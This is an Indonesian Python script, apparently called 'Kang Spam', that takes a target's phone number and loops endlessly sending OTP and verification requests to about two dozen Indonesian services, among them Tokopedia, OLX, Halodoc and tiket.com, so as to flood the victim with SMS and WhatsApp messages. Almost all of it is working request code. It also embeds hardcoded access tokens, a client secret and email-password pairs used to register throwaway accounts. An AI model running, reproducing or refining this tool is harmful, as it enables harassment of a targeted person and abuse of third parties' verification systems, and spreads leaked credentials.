import os,sys,time,os,json,requests,re
from colorama import Fore,Back,init
from requests import get,post

def autoketik(s):
    for c in s + "\n":
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(0.005)

B = Fore.BLUE
W = Fore.WHITE
R = Fore.RED
G = Fore.GREEN
BL = Fore.BLACK
Y = Fore.YELLOW

ip=requests.get('https://api.ipify.org').text
ua=requests.get('http://xenzi-ganz.6te.net/User-Agent.php').text
localtime=time.asctime(time.localtime(time.time()))

Hijau="\033[1;92m "
putih="\033[1;97m"
abu="\033[1;90m"
kuning="\033[1;93m"
ungu="\033[1;95m"
merah="\033[1;91m"
biru="\033[1;96m"


def countdown(time_sec):
	try:
		while time_sec:
			mins, secs = divmod(time_sec,60)
			timeformat = '\033[1;97m[\033[1;93m•\033[1;97m] Silahkan Menunggu Dalam Waktu \033[1;92m{:02d}:{:02d}'.format(mins,secs)
			print(timeformat,end='\r')
			time.sleep(1)
			time_sec -= 1
			print (f"{W}[{Y}•{W}] Sedang Menyepam Ulang....           ")
			time.sleep(5)
	except KeyboardInterrupt:
		print (f"{W}Spam Di Hentikan [{R}!{W}]")
		sys.exit()


def tanya():
    a = input(f"{W}[{Y}?{W}] Spam Ulang? ({Y}y{W}/{Y}t{W}){R} :{G} ")
    if a == "y" or a == "Y":
        start()
    if a == "t" or a == "T":
        print (f"{W}[{R}!{W}] Berhasil Keluar Dari Tools {R}!!!{W}")
        sys.exit()
    if a == "" or a == " ":
        print (f"{W}[{R}!{W}] Masukkan Pilihan Dengan Benar {R}!!!{W}")
        sys.exit



def spam():
   try:
        os.system("clear")
        banner()
        nomor = input(f"{W}[{R}?{W}] Masukkan Nomor Target {Y}:{G} ")
        while True:
            url = requests.get(f"https://darkteam.my.id/pranktool/otospam/index.php?nomor={nomor}")
            url = requests.get(f"https://darkteam.my.id/minispam/spamsms.php?nomor={nomor}")
            toko = requests.post("https://www.hitoko.co.id/erp/api/auth/send-verification-code",headers={"Host":"www.hitoko.co.id","content-length":"59","accept":"application/json, text/plain, */*","content-type":"application/json","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://www.hitoko.co.id","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.hitoko.co.id/ads?channel=SmartSEMAds&gclid=Cj0KCQjwjvaYBhDlARIsAO8PkE1M8CF0t5AXU6bz7-mrXUaXhx60xLysZLHga81K0euGTcd7UxjDiy0aAlItEALw_wcB","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":"62"+nomor,"sign":"lRADC/amP1+YPmlx2l2Z+g=="})).text
            pos = requests.post("https://ua.ctcorpmpc.com/blade-user/api/user/getotp",headers={"Host":"ua.ctcorpmpc.com","Connection":"keep-alive","Content-Length":"148","Blade-Auth":"Bearer 22222","sec-ch-ua-mobile":"?1","Authorization":"Basic c3dvcmQ6c3dvcmRfc2VjcmV0","Content-Type":"application/json;charset=UTF-8","User-Agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","X-requested-With":"XMLHttpRequest","Tenant-Id":"000000","sec-ch-ua-platform":"Android","Accept":"*/*","Origin":"https://ua.ctcorpmpc.com","Sec-Fetch-Site":"same-origin","Sec-Fetch-Mode":"cors","Sec-Fetch-Dest":"empty","Referer":"https://ua.ctcorpmpc.com/cas-web/","Accept-Encoding":"gzip, deflate, br","Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phoneNo":nomor,"tplId":"4001001","tms":1662434407722,"requestId":"6e1b8c1c-fe2f-4418-851b-d31af02f0c221662434407722","intlPhoneCode":"62"})).text
            Sanz = requests.post("https://www.olx.co.id/api/auth/authenticate",data=json.dumps({"grantType": "retry","method": "sms","phone":"62"+nomor,"language": "id"}), headers={"accept": "*/*","x-newrelic-id": "VQMGU1ZVDxABU1lbBgMDUlI=","x-panamera-fingerprint": "83b09e49653c37fb4dc38423d82d74d7#1597271158063","user-agent": "Mozilla/5.0 (Linux; Android 5.1.1; SM-G600S Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/59.0.3071.125 Mobile Safari/537.36","content-type": "application/json"}).text
            bima = requests.post("https://bima.tri.co.id/apibima/login/otp-request",headers={"Host":"bima.tri.co.id","Connection":"keep-alive","Content-Length":"46","sec-ch-ua-mobile":"?1","Authorization":"Bearer","Access-Control-Allow-Methods":"GET,POST,OPTIONS","Content-Type":"application/json","Access-Control-Allow-Origin":"*","Accept":"application/json, text/plain, */*","app-version":"selfcare","User-Agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","Access-Control-Allow-Headers":"Content-Type","sec-ch-ua-platform":"Android","Origin":"https://bima.tri.co.id","Sec-Fetch-Site":"same-origin","Sec-Fetch-Mode":"cors","Sec-Fetch-Dest":"empty","Referer":"https://bima.tri.co.id/","Accept-Encoding":"gzip, deflate, br","Accept-Language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"imei":"WebSelfcare","msisdn":"0"+nomor})).text
            pos = requests.post("https://beryllium.mapclub.com/api/member/registration/sms/otp",headers={"Host":"beryllium.mapclub.com","content-type":"application/json","accept-language":"en-US","accept":"application/json, text/plain, */*","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","origin":"https://www.mapclub.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.mapclub.com/","accept-encoding":"gzip, deflate, br"},data=json.dumps({"account":nomor})).text
            oyo = requests.post("https://identity-gateway.oyorooms.com/identity/api/v1/otp/generate_by_phone?locale=id",headers={"Host": "identity-gateway.oyorooms.com","consumer_host": "https://www.oyorooms.com","accept-language": "id","access_token": "SFI4TER1WVRTakRUenYtalpLb0w6VnhrNGVLUVlBTE5TcUFVZFpBSnc=","User-Agent":"Mozilla/5.0 (Linux; Android 5.0; SAMSUNG SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36","Content-Type": "application/json","accept": "*/*","origin": "https://www.oyorooms.com","referer": "https://www.oyorooms.com/login","Accept-Encoding": "gzip, deflate, br"},data=json.dumps({"phone":f"0"+nomor,"country_code": "+62","country_iso_code": "ID","nod": "4","send_otp": "true","devise_role": "Consumer_Guest"})).text
            fave = requests.post("https://api.myfave.com/api/fave/v3/auth",headers={"Host": "api.myfave.com","Connection": "keep-alive","x-user-agent": "Fave-PWA/v1.0.0","Origin": "https://m.myfave.com","User-Agent":"Mozilla/5.0 (Linux; Android 10; SM-A305F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36","content-type": "application/json","Accept": "*/*","Referer": "https://m.myfave.com/jakarta/auth","Accept-Encoding": "gzip, deflate, br","Accept-Language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":"+62"+nomor})).text
            kum = requests.post("https://graphql-v4.kumparan.com/query",headers={"Host":"graphql-v4.kumparan.com","content-length":"179","accept":"*/*","content-type":"text/plain","env-client":"d52f487fa02230a23dbdc6e5a67545ddc59e4766d0a326d3f4a814b74ecc045e9382fed825b0d75ec7fa16588a50d75d","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://m.kumparan.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.kumparan.com/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"operationName":"CreateOTPAndSendSMS","variables":{"phone":nomor},"query":"mutation CreateOTPAndSendSMS($phone: String!) {\n  CreateOTPAndSendSMS(phone: $phone)\n}\n"})).text
            req = requests.post("https://www.alodokter.com/resend-otp",headers={"Host":"www.alodokter.com","content-length":"79","accept":"application/json","content-type":"application/json","x-csrf-token":"1vY8ALd4lTVDYLVTf9oKFIErgYgwX0cf07gHJNaWpwIMuYQmGdkMXbkKLn+O2+tYjYsfE4zzJm5ERoZgqG0kXg==","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://www.alodokter.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.alodokter.com/otp_phone_number","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"user":{"phone":nomor,"uuid":"2f4432dd-2c42-463c-9523-3ee8aead4dd2"}})).text
            moka = requests.post("https://service.mokapos.com/account/v1/verification/phone/send",headers={  "accept": "application/json, text/plain, */*","authorization": "undefined","save-data": "on","user-agent": "Mozilla/5.0 (Linux; Android 6.0.1; SM-J500M Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36","content-type": "application/json;charset=UTF-8"},data=json.dumps({"phone_number":f"+62"+nomor})).text
            rupa2 = requests.post("https://wapi.ruparupa.com/auth/generate-otp",headers={"Host":"wapi.ruparupa.com","content-length":"120","sec-ch-ua-mobile":"?1","authorization":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiMjE2ZWEyZGItNzI5Ni00NDY0LTk4ODItNDMyZTc2MDRmYzIyIiwiaWF0IjoxNjYyNDI1NzExLCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.p_Lhn466pAC8cwn1mGCasYIKxV1Rb3toLQS8WKJABfU","content-type":"application/json","x-company-name":"odi","accept":"application/json","informa-b2b":"false","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","user-platform":"mobile","x-frontend-type":"mobile","sec-ch-ua-platform":"Android","origin":"https://m.ruparupa.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.ruparupa.com/verification?page=otp-choices","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":"0"+nomor,"action":"register","channel":"message","email":"","token":"","customer_id":"0","is_resend":0})).text
            pizzahut = requests.post('https://api-prod.pizzahut.co.id/customer/v1/customer/register', headers={'Host': 'api-prod.pizzahut.co.id','content-length': '157','x-device-type': 'PC','sec-ch-ua-mobile': '?1','x-platform': 'WEBMOBILE','x-channel': '2','content-type': 'application/json;charset=UTF-8','accept': 'application/json','x-client-id': 'b39773b0-435b-4f41-80e9-163eef20e0ab','user-agent': 'Mozilla/5.0 (Linux; Android 11; vivo 2007) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36','x-lang': 'en','save-data': 'on','x-device-id': 'web','origin': 'https://www.pizzahut.co.id','sec-fetch-site': 'same-site','sec-fetch-mode': 'cors','sec-fetch-dest': 'empty','referer': 'https://www.pizzahut.co.id/','accept-encoding': 'gzip, deflate, br','accept-language': 'id-ID,id;q=0.9,en;q=0.8'},data=json.dumps({  "email": "aldigg088@gmail.com",  "first_name": "Xenzi",  "last_name": "Wokwokw",  "password": "Aldi++\\/67",  "phone": "0"+nomor,  "birthday": "2000-01-02"})).text
            qoala = requests.post("https://api.qoala.app/api/registrations",headers={"Host":"api.qoala.app","content-length":"196","content-type":"application/json;charset=UTF-8","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://www.qoala.app","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.qoala.app/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"fullName":"Sanzzxd","email":"ucupg791@gmail.com","phoneNumber":"+62"+nomor,"identityType":"KTP","nationality":"ID","password":"Udingans23@","passwordConfirmation":"Udingans23@","lang":"id"})).text
            gaskeun = requests.post("https://api.tokko.io/graphql",headers={"Host":"api.tokko.io","accept-language":"id","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json","accept":"*/*","origin":"https://web.lummoshop.com","sec-fetch-site":"cross-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://web.lummoshop.com/","accept-encoding":"gzip, deflate, br"},data=json.dumps({"operationName":"generateOTP","variables":{"generateOtpInput":{"phoneNumber":"+62"+nomor,"hashCode":"","channel":"SMS","userType":"MERCHANT"}},"query":"mutation generateOTP($generateOtpInput: GenerateOtpInput!) {\n  generateOtp(generateOtpInput: $generateOtpInput) {\n    phoneNumber\n  }\n}\n"})).text
            halo = requests.post("https://www.halodoc.com/api/v1/users/authentication/otp/requests",headers={"Host":"www.halodoc.com","content-length":"49","accept":"application/json, text/plain, */*","x-xsrf-token":"BF690A34F465F3176E23CB1EECDFF63DAB6D3C6E78E72B2CE7F840AEE3C549E10D39A3E6EC57BA2DE7D1F70C7BC406189FDD","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","content-type":"application/json","origin":"https://www.halodoc.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone_number":"+62"+nomor,"channel":"sms"})).text
            din = requests.post("https://m.misteraladin.com/api/members/v2/otp/request",headers={"Host":"m.misteraladin.com","content-length":"95","accept-language":"id","sec-ch-ua-mobile":"?1","authorization":"","content-type":"application/json;charset=UTF-8","accept":"application/json, text/plain, */*","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","x-platform":"mobile-web","sec-ch-ua-platform":"Android","origin":"https://m.misteraladin.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.misteraladin.com/account","accept-encoding":"gzip, deflate, br"},data=json.dumps({"fullname":"","phone_number_country_code":"62","phone_number":nomor,"type":"register"})).text
            rif = requests.post("https://api.kredinesia.id/v1/login/verificationCode",headers={"Host":"api.kredinesia.id","accept":"application/json, text/plain, */*","user-agent":"Mozilla/5.0 (Linux; Android 10; M2006C3LG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36","content-type":"application/json;charset=UTF-8","origin":"https://www.kredinesia.id","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.kredinesia.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":nomor,"captcha":""})).text
            tod = requests.post("https://api.tokko.io/graphql",headers={"Host":"api.tokko.io","content-length":"306","accept-language":"id","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","x-tokko-api-client":"merchant_web","content-type":"application/json","accept":"*/*","x-tokko-api-client-version":"4.5.1","sec-ch-ua-platform":"Android","origin":"https://web.lummoshop.com","sec-fetch-site":"cross-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://web.lummoshop.com/","accept-encoding":"gzip, deflate, br"},data=json.dumps({"operationName":"generateOTP","variables":{"generateOtpInput":{"phoneNumber":"+62"+nomor,"hashCode":"","channel":"WHATSAPP","userType":"MERCHANT"}},"query":"mutation generateOTP($generateOtpInput: GenerateOtpInput!) {\n  generateOtp(generateOtpInput: $generateOtpInput) {\n    phoneNumber\n  }\n}\n"})).text
            kon = requests.post("https://api-v2.bukuwarung.com/api/v2/auth/otp/send",headers={"Host":"api-v2.bukuwarung.com","content-length":"198","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","content-type":"application/json","x-app-version-name":"android","accept":"application/json, text/plain, */*","x-app-version-code":"3001","buku-origin":"tokoko-web","sec-ch-ua-platform":"Android","origin":"https://tokoko.id","sec-fetch-site":"cross-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://tokoko.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"action":"LOGIN_OTP","countryCode":"+62","deviceId":"test-1","method":"WA","phone":nomor,"clientId":"2e3570c6-317e-4524-b284-980e5a4335b6","clientSecret":"S81VsdrwNUN23YARAL54MFjB2JSV2TLn"})).text
            jing = requests.post("https://api.qoalaplus.com/go-agent/v2/user/register",headers={"Host":"api.qoalaplus.com","content-length":"48","accept":"application/json, text/plain, */*","content-type":"application/json","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://www.qoalaplus.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.qoalaplus.com/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone_number":"+62"+nomor,"channel":"WA"})).text
            mek = requests.post("https://www.carsome.id/website/login/sendSMS",headers={"Host":"www.carsome.id","content-length":"38","x-language":"id","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","content-type":"application/json","accept":"application/json, text/plain, */*","country":"ID","x-amplitude-device-id":"A4p3vs1Ixu9wp3wFmCEG9K","sec-ch-ua-platform":"Android","origin":"https://www.carsome.id","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.carsome.id/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"username":nomor,"optType":1})).text
            rupa = requests.post("https://wapi.ruparupa.com/auth/generate-otp",headers={"Host":"wapi.ruparupa.com","content-length":"117","sec-ch-ua-mobile":"?1","authorization":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1dWlkIjoiN2JjZTk0N2QtZTMwOS00YjYyLTk1NWItZTJkNTMyNWVmY2U5IiwiaWF0IjoxNjYyMzczNjM2LCJpc3MiOiJ3YXBpLnJ1cGFydXBhIn0.FEO05D4v9bvaU-Kpgo4XvwbIWhbm3uamIDTCsRmm_Gs","content-type":"application/json","x-company-name":"odi","accept":"application/json","informa-b2b":"false","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","user-platform":"mobile","x-frontend-type":"mobile","sec-ch-ua-platform":"Android","origin":"https://m.ruparupa.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.ruparupa.com/verification?page=otp-choices","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"phone":nomor,"action":"register","channel":"chat","email":"","token":"","customer_id":"0","is_resend":0})).text
            pos = requests.post("https://www.matahari.com/rest/V1/thorCustomers/registration-resend-otp",headers={"Host":"www.matahari.com","content-length":"76","x-newrelic-id":"Vg4GVFVXDxAGVVlVBgcGVlY=","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","content-type":"application/json","accept":"*/*","x-requested-with":"XMLHttpRequest","sec-ch-ua-platform":"Android","origin":"https://www.matahari.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://www.matahari.com/customer/account/create/","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"otp_request":{"mobile_number":nomor,"mobile_country_code":"+62"}})).text
            tiket = requests.post("https://gql.tiket.com/",headers={"Host":"gql.tiket.com","content-length":"861","deviceid":"94c367e263f2084cf76955d6ed049664","newsession":"true","tiketsessionid":"68809137-d18e-47c5-93c4-7d7d4a1dcd47","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","content-type":"application/json","accept":"*/*","channelid":"MOBILE","lang":"id","platform":"mweb","origin":"https://m.tiket.com","sec-fetch-site":"same-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://m.tiket.com/login","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"operationName":"postOtpGenerateV2","variables":{"ignoreRecipient":"","recipient":"+62"+nomor,"deviceId":"484c6211-c182-4de8-a71f-8be3d9","requestType":"GUEST_VERIFY_PHONE","magicLinkAdditionalParameter":"type=SHOW_DETAIL_FORM&fieldStatus=UNREGISTERED"},"query":"mutation postOtpGenerateV2($recipient: String, $requestType: String, $ignoreRecipient: Boolean, $magicLinkAdditionalParameter: String, $fullName: String, $deviceId: String) {\n  otpGenerateV2(recipient: $recipient, requestType: $requestType, ignoreRecipient: $ignoreRecipient, magicLinkAdditionalParameter: $magicLinkAdditionalParameter, fullName: $fullName, deviceId: $deviceId) {\n    code\n    message\n    data {\n      exist\n      expired\n      maskedAccount\n      nextAvailableRequest\n      trxId\n      __typename\n    }\n    errors\n    serverTime\n    __typename\n  }\n}\n"})).text
            site = requests.get('https://accounts.tokopedia.com/otp/c/page?otp_type=116&msisdn=0'+nomor+'&ld=https%3A%2F%2Faccounts.tokopedia.com%2Fregister%3Ftype%3Dphone%26phone%3D{}%26status%3DeyJrIjp0cnVlLCJtIjp0cnVlLCJzIjpmYWxzZSwiYm90IjpmYWxzZSwiZ2MiOmZhbHNlfQ%253D%253D', headers = {'Connection' : 'keep-alive','Accept' : 'application/json, text/javascript, */*; q=0.01','Origin' : 'https://accounts.tokopedia.com','X-Requested-With' : 'XMLHttpRequest','User-Agent' : '{acak}','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8','Accept-Encoding' : 'gzip, deflate',}).text
            search = re.search(r'\<input\ id\=\"Token\"\ value\=\"(.*?)\"\ type\=\"hidden\"\>', site).group(1)
            sending = requests.post('https://accounts.tokopedia.com/otp/c/ajax/request-wa', headers = {'Connection' : 'keep-alive','Accept' : 'application/json, text/javascript, */*; q=0.01','Origin' : 'https://accounts.tokopedia.com','X-Requested-With' : 'XMLHttpRequest','User-Agent' : '{acak}','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8','Accept-Encoding' : 'gzip, deflate',}, data = {'otp_type' : '116','msisdn' : '0'+nomor,'tk' : search,'email' : '','original_param' : '','user_id' : '','signature' : '',})
            tod = requests.post("https://api.tokko.io/graphql",headers={"Host":"api.tokko.io","content-length":"306","accept-language":"id","sec-ch-ua-mobile":"?1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","x-tokko-api-client":"merchant_web","content-type":"application/json","accept":"*/*","x-tokko-api-client-version":"4.5.1","sec-ch-ua-platform":"Android","origin":"https://web.lummoshop.com","sec-fetch-site":"cross-site","sec-fetch-mode":"cors","sec-fetch-dest":"empty","referer":"https://web.lummoshop.com/","accept-encoding":"gzip, deflate, br"},data=json.dumps({"operationName":"generateOTP","variables":{"generateOtpInput":{"phoneNumber":"+62"+nomor,"hashCode":"","channel":"WHATSAPP","userType":"MERCHANT"}},"query":"mutation generateOTP($generateOtpInput: GenerateOtpInput!) {\n  generateOtp(generateOtpInput: $generateOtpInput) {\n    phoneNumber\n  }\n}\n"})).text
            req=requests.post("https://auth.sampingan.co/v1/otp",data=json.dumps({"channel":"WA","country_code":"+62","phone_number":nomor}),headers={"Host":"auth.sampingan.co","domain-name":"auth-svc","app-auth":"Skip","content-type":"application/json; charset=UTF-8","user-agent":"okhttp/4.9.1","accept":"application/vnd.full+json","accept":"application/json","content-type":"application/vnd.full+json","content-type":"application/json","app-version":"2.1.2","app-platform":"Android"}).text
            pos = requests.post("https://www.sayurbox.com/graphql/v1?deduplicate=1",headers={"Host":"www.sayurbox.com","content-length":"289","sec-ch-ua-mobile":"?1","authorization":"eyJhbGciOiJSUzI1NiIsImtpZCI6ImY4NDY2MjEyMTQxMjQ4NzUxOWJiZjhlYWQ4ZGZiYjM3ODYwMjk5ZDciLCJ0eXAiOiJKV1QifQ.eyJhbm9ueW1vdXMiOnRydWUsImF1ZCI6InNheXVyYm94LWF1ZGllbmNlIiwiYXV0aF90aW1lIjoxNjYzMDMzMjMyLCJleHAiOjE2NjU2MjUyMzIsImlhdCI6MTY2MzAzMzIzMiwiaXNzIjoiaHR0cHM6Ly93d3cuc2F5dXJib3guY29tIiwibWV0YWRhdGEiOnsiZGV2aWNlX2luZm8iOm51bGx9LCJuYW1lIjpudWxsLCJwaWN0dXJlIjpudWxsLCJwcm92aWRlcl9pZCI6ImFub255bW91cyIsInNpZCI6ImIwYjc1ZjI1LTllZmYtNDJjNS1hNmJiLWMyYjA3ZGI2YjVkOSIsInN1YiI6IllsNzB5YmtVWFl1dmstU3BTbkQ0ODlWX3NGOTIiLCJ1c2VyX2lkIjoiWWw3MHlia1VYWXV2ay1TcFNuRDQ4OVZfc0Y5MiJ9.O4q-UivX21M0sgardgyPRlsqZ5fqgq2XyqM28emRn26Q9bUnR_bOo5VivtNwS5U3QZi5EHJwRhlxOsGg3xcuLPHW5pcAESEOjQzlfvVVFWV8ppbpb2dzFBFsmmeuWCmJReuCfbLr6jYE8eUfg_Yq6WGdbtOX0PGk-Gq8KkrzOm7p0eTRHIkjU0cYiHQk4gbJKYV6SHJdR0Mdit5FbwXLkYGBF5hvRoFU_Iwd4-4JD1Er6QtTMYMPAP2nZ5wlfUGTQlrPLhdF_pRXIauiWQxNqIXGXdOk5fG9yU3FPF1XDhp78I6s7Jvu6ppYowEPCzkuj44W4oDaMGQjrIMD-uNzXA","content-type":"application/json","accept":"*/*","x-bundle-revision":"6.0","x-sbox-tenant":"sayurbox","x-binary-version":"2.2.1","user-agent":"Mozilla/5.0 (Linux; Android 9; Redmi 6A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Mobile Safari/537.36","sec-ch-ua-platform":"Android","origin":"https://www.sayurbox.com","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-dest":"empty","accept-encoding":"gzip, deflate, br","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"},data=json.dumps({"operationName":"generateOTP","variables":{"destinationType":"whatsapp","identity":"+62"+nomor},"query":"mutation generateOTP($destinationType: String!, $identity: String!) {\n  generateOTP(destinationType: $destinationType, identity: $identity) {\n    id\n    __typename\n  }\n}"})).text
            autoketik(f"{W}[{G}✓{W}] Sukses Mengirim Spam")
            countdown(30) # Jangan Diubah !!!!
   except KeyboardInterrupt:
        print ("")
        tanya()


def banner():
    ip=requests.get('https://api.ipify.org').text 
    autoketik (f"""
{biru}╦╔═{W}┌─┐┌┐┌┌─┐  {biru}╔═╗{W}┌─┐┌─┐┌┬┐
{biru}╠╩╗{W}├─┤││││ ┬  {biru}╚═╗{W}├─┘├─┤│││
{biru}╩ ╩{W}┴ ┴┘└┘└─┘  {biru}╚═╝{W}┴  ┴ ┴┴ ┴
 {putih}[{biru}•{putih}] {biru}Author {putih}: SanzzXD
 {putih}[{biru}•{putih}] {biru}Youtube {putih}: SanzzXD

 {W}[{Y}•{W}] Ip Lu Nih Njing{R}:{Y} {ip}
 {W}[{Y}•{W}] Waktu/Jam{R}:{Y} {localtime}
""")

os.system("clear")
def banner2():
    print(f"""
{W}[{biru}1{W}] {W}Spam Brutal 24 Jam Delay {W}({G}On{W})
{W}[{biru}2{W}] {W}Support Gua Ngab {W}({G}On{W})
{W}[{biru}3{W}] {W}Keluar {W}({G}Byee Njg{W})
""")

def start():
    banner()
    banner2()
